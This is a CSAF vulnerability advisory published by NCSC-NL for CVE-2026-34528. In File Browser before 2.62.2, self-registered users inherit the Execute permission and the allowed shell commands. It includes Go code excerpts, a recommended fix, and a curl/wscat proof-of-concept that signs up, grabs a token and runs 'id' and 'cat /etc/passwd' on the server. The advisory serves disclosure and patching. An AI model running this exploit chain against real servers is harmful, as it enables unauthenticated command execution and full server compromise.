{ "document": { "category": "csaf_base", "csaf_version": "2.0", "distribution": { "tlp": { "label": "WHITE" } }, "lang": "en", "notes": [ { "category": "legal_disclaimer", "text": "The Netherlands Cyber Security Center (henceforth: NCSC-NL) maintains this portal to enhance access to its information and vulnerabilities. The use of this information is subject to the following terms and conditions:\n\nThe vulnerabilities disclosed in this portal are gathered by NCSC-NL from a variety of open sources, which the user can retrieve from other platforms. NCSC-NL makes every reasonable effort to ensure that the content of this portal is kept up to date, and that it is accurate and complete. Nevertheless, NCSC-NL cannot entirely rule out the possibility of errors, and therefore cannot give any warranty in respect of its completeness, accuracy or real-time keeping up-to-date. NCSC-NL does not control nor guarantee the accuracy, relevance, timeliness or completeness of information obtained from these external sources. The vulnerabilities disclosed in this portal are intended solely for the convenience of professional parties to take appropriate measures to manage the risks posed to the cybersecurity. No rights can be derived from the information provided therein.\n\nNCSC-NL and the Kingdom of the Netherlands assume no legal liability or responsibility for any damage resulting from either the use or inability of use of the vulnerabilities disclosed in this portal. This includes damage resulting from the inaccuracy of incompleteness of the information contained in it.\nThe information on this page is subject to Dutch law. All disputes related to or arising from the use of this portal regarding the disclosure of vulnerabilities will be submitted to the competent court in The Hague. This choice of means also applies to the court in summary proceedings." } ], "publisher": { "category": "coordinator", "contact_details": "cert@ncsc.nl", "name": "National Cyber Security Centre", "namespace": "https://www.ncsc.nl/" }, "title": "CVE-2026-34528", "tracking": { "current_release_date": "2026-04-02T14:59:32.219088Z", "generator": { "date": "2026-02-17T15:00:00Z", "engine": { "name": "V.E.L.M.A", "version": "1.7" } }, "id": "CVE-2026-34528", "initial_release_date": "2026-04-01T01:03:22.011785Z", "revision_history": [ { "date": "2026-04-01T01:03:22.011785Z", "number": "1", "summary": "CVE created.| Source created.| CVE status created. (valid)| Description created for source.| CVSS created.| References created (2).| CWES updated (1)." }, { "date": "2026-04-01T01:03:27.174292Z", "number": "2", "summary": "NCSC Score created." }, { "date": "2026-04-01T07:49:58.945924Z", "number": "3", "summary": "NCSC Score updated." }, { "date": "2026-04-01T21:38:57.990550Z", "number": "4", "summary": "Source created.| CVE status created. (valid)| Description created for source.| CVSS created.| Products connected (1).| References created (2).| CWES updated (1)." }, { "date": "2026-04-01T21:38:59.490613Z", "number": "5", "summary": "NCSC Score updated." }, { "date": "2026-04-01T23:28:39.912496Z", "number": "6", "summary": "Source created.| CVE status created. (valid)| Description created for source.| CVSS created.| References created (2).| CWES updated (1)." }, { "date": "2026-04-01T23:28:41.597095Z", "number": "7", "summary": "NCSC Score updated." }, { "date": "2026-04-02T14:39:51.959275Z", "number": "8", "summary": "Unknown change." }, { "date": "2026-04-02T14:39:53.472432Z", "number": "9", "summary": "NCSC Score updated." }, { "date": "2026-04-02T14:59:13.473317Z", "number": "10", "summary": "Source connected.| CVE status created. (valid)| EPSS created." }, { "date": "2026-04-02T14:59:17.185885Z", "number": "11", "summary": "NCSC Score updated." } ], "status": "interim", "version": "11" } }, "product_tree": { "branches": [ { "branches": [ { "branches": [ { "category": "product_version_range", "name": "vers:unknown/<2.62.2", "product": { "name": "vers:unknown/<2.62.2", "product_id": "CSAFPID-5982482" } } ], "category": "product_name", "name": "File Browser" } ], "category": "vendor", "name": "File Browser" } ] }, "vulnerabilities": [ { "cve": "CVE-2026-34528", "notes": [ { "category": "description", "text": "## Summary\n\nThe `signupHandler` in File Browser applies default user permissions via `d.settings.Defaults.Apply(user)`, then strips only `Admin` (commit `a63573b`). The `Execute` permission and `Commands` list from the default user template are **not** stripped. When an administrator has enabled signup, server-side execution, and set `Execute=true` in the default user template, any unauthenticated user who self-registers inherits shell execution capabilities and can run arbitrary commands on the server.\n\n## Details\n\n### Root Cause\n\n`signupHandler` at `http/auth.go:167–172` applies all default permissions before stripping only `Admin`:\n\n```go\n// http/auth.go\nd.settings.Defaults.Apply(user) // copies ALL permissions from defaults\n\n// Only Admin is stripped — Execute, Commands are still inherited\nuser.Perm.Admin = false\n// user.Perm.Execute remains true if set in defaults\n// user.Commands remains populated if set in defaults\n```\n\n`settings/defaults.go:31–33` confirms `Apply` copies the full permissions struct including Execute and Commands:\n\n```go\nfunc (d *UserDefaults) Apply(u *users.User) {\n u.Perm = d.Perm // includes Execute\n u.Commands = d.Commands // includes allowed shell commands\n // ...\n}\n```\n\nThe `commandsHandler` at `http/commands.go:63–66` checks both the server-wide `EnableExec` flag and `d.user.Perm.Execute`:\n\n```go\nif !d.server.EnableExec || !d.user.Perm.Execute {\n // writes \"Command not allowed.\" and returns\n}\n```\n\nThe `withUser` middleware reads `d.user` from the database at request time (`http/auth.go:103`), so the persisted `Execute=true` and `Commands` values from signup are authoritative. The command allowlist check at `commands.go:80` passes because the user's `Commands` list contains the inherited default commands:\n\n```go\nif !slices.Contains(d.user.Commands, name) {\n // writes \"Command not allowed.\" and returns\n}\n```\n\n### Execution Flow\n\n1. Admin configures: `Signup=true`, `EnableExec=true`, `Defaults.Perm.Execute=true`, `Defaults.Commands=[\"bash\"]`\n2. Unauthenticated attacker POSTs to `/api/signup` → new user created with `Execute=true`, `Commands=[\"bash\"]`\n3. Attacker logs in → receives JWT with valid user ID\n4. Attacker opens WebSocket to `/api/command/` → `withUser` fetches user from DB, `Execute=true` passes check\n5. Attacker sends `bash` over WebSocket → `exec.Command(\"bash\")` is invoked → arbitrary shell execution\n\nThis is a direct consequence of the incomplete fix in commit `a63573b` (CVE-2026-32760 / GHSA-5gg9-5g7w-hm73), which applied the same rationale (\"signup users should not inherit privileged defaults\") only to `Admin`, not to `Execute` and `Commands`.\n\n## PoC\n\n```bash\nTARGET=\"http://localhost:8080\"\n\n# Step 1: Self-register (no authentication required)\ncurl -s -X POST \"$TARGET/api/signup\" \\\n -H \"Content-Type: application/json\" \\\n -d '{\"username\":\"attacker\",\"password\":\"AttackerP@ss1!\"}'\n# Returns: 200 OK\n\n# Step 2: Log in and capture token\nTOKEN=$(curl -s -X POST \"$TARGET/api/login\" \\\n -H \"Content-Type: application/json\" \\\n -d '{\"username\":\"attacker\",\"password\":\"AttackerP@ss1!\"}' | tr -d '\"')\n\n# Step 3: Inspect inherited permissions (decode JWT payload)\necho \"$TOKEN\" | cut -d'.' -f2 | base64 -d 2>/dev/null | python3 -m json.tool\n# Expected output (if defaults have Execute=true, Commands=[\"bash\"]):\n# {\n# \"user\": {\n# \"perm\": { \"execute\": true, ... },\n# \"commands\": [\"bash\"],\n# ...\n# }\n# }\n\n# Step 4: Execute shell command via WebSocket (requires wscat: npm install -g wscat)\necho '{\"command\":\"bash -c \\\"id && hostname && cat /etc/passwd | head -3\\\"\"}' | \\\n wscat --header \"X-Auth: $TOKEN\" \\\n --connect \"$TARGET/api/command/\" \\\n --wait 3\n# Expected: uid=... hostname output followed by /etc/passwd lines\n```\n\n## Impact\n\nOn any deployment where an administrator has:\n1. Enabled public self-registration (`signup = true`)\n2. Enabled server-side command execution (`enableExec = true`)\n3. Set `Execute = true` in the default user template\n4. Populated `Commands` with one or more shell commands\n\nAn unauthenticated attacker can self-register and immediately gain the ability to run arbitrary shell commands on the server with the privileges of the File Browser process. All files accessible to the process, environment variables (including secrets), and network interfaces are exposed. This is a complete server compromise for processes running as root, and a significant lateral movement vector otherwise.\n\nThe original `Admin` fix (GHSA-5gg9-5g7w-hm73) demonstrates that the project explicitly recognizes that self-registered users should not inherit privileged defaults. The `Execute` + `Commands` omission is an incomplete application of that principle.\n\n## Recommended Fix\n\nExtend the existing Admin stripping in `http/auth.go` to also clear `Execute` and `Commands` for self-registered users:\n\n```go\n// http/auth.go — after d.settings.Defaults.Apply(user)\n\n// Users signed up via the signup handler should never become admins, even\n// if that is the default permission.\nuser.Perm.Admin = false\n\n// Self-registered users should not inherit execution capabilities from\n// default settings, regardless of what the administrator has configured\n// as the default. Execution rights must be explicitly granted by an admin.\nuser.Perm.Execute = false\nuser.Commands = []string{}\n```", "title": "github - https://api.github.com/advisories/GHSA-x8jc-jvqm-pm3f" }, { "category": "description", "text": "File Browser is a file managing interface for uploading, deleting, previewing, renaming, and editing files within a specified directory. Prior to version 2.62.2, the signupHandler in File Browser applies default user permissions via d.settings.Defaults.Apply(user), then strips only Admin. The Execute permission and Commands list from the default user template are not stripped. When an administrator has enabled signup, server-side execution, and set Execute=true in the default user template, any unauthenticated user who self-registers inherits shell execution capabilities and can run arbitrary commands on the server. This issue has been patched in version 2.62.2.", "title": "cveprojectv5 - https://raw.githubusercontent.com/CVEProject/cvelistV5/main/cves/2026/34xxx/CVE-2026-34528.json" }, { "category": "description", "text": "File Browser is a file managing interface for uploading, deleting, previewing, renaming, and editing files within a specified directory. Prior to version 2.62.2, the signupHandler in File Browser applies default user permissions via d.settings.Defaults.Apply(user), then strips only Admin. The Execute permission and Commands list from the default user template are not stripped. When an administrator has enabled signup, server-side execution, and set Execute=true in the default user template, any unauthenticated user who self-registers inherits shell execution capabilities and can run arbitrary commands on the server. This issue has been patched in version 2.62.2.", "title": "nvd - https://services.nvd.nist.gov/rest/json/cves/2.0?cveId=CVE-2026-34528" }, { "category": "other", "text": "0.00083", "title": "EPSS" }, { "category": "other", "text": "4.3", "title": "NCSC Score" }, { "category": "other", "text": "Is related to CWE-269 (Improper Privilege Management)", "title": "NCSC Score top increasing factors" }, { "category": "other", "text": "There is cwe data available from source Nvd, Is related to (a version of) an uncommon product, The value of the most recent EPSS score", "title": "NCSC Score top decreasing factors" } ], "product_status": { "known_affected": [ "CSAFPID-5982482" ] }, "references": [ { "category": "external", "summary": "Source - github", "url": "https://api.github.com/advisories/GHSA-x8jc-jvqm-pm3f" }, { "category": "external", "summary": "Source - cveprojectv5", "url": "https://raw.githubusercontent.com/CVEProject/cvelistV5/main/cves/2026/34xxx/CVE-2026-34528.json" }, { "category": "external", "summary": "Source - nvd", "url": "https://services.nvd.nist.gov/rest/json/cves/2.0?cveId=CVE-2026-34528" }, { "category": "external", "summary": "Source - first", "url": "https://api.first.org/data/v1/epss?limit=10000&offset=0" }, { "category": "external", "summary": "Reference - cveprojectv5; github; nvd", "url": "https://github.com/filebrowser/filebrowser/security/advisories/GHSA-x8jc-jvqm-pm3f" }, { "category": "external", "summary": "Reference - github", "url": "https://github.com/advisories/GHSA-x8jc-jvqm-pm3f" }, { "category": "external", "summary": "Reference - cveprojectv5; nvd", "url": "https://github.com/filebrowser/filebrowser/releases/tag/v2.62.2" } ], "scores": [ { "cvss_v3": { "version": "3.1", "vectorString": "CVSS:3.1/AV:N/AC:H/PR:N/UI:N/S:U/C:H/I:H/A:H", "baseScore": 8.1, "baseSeverity": "HIGH" }, "products": [ "CSAFPID-5982482" ] } ], "title": "CVE-2026-34528" } ] }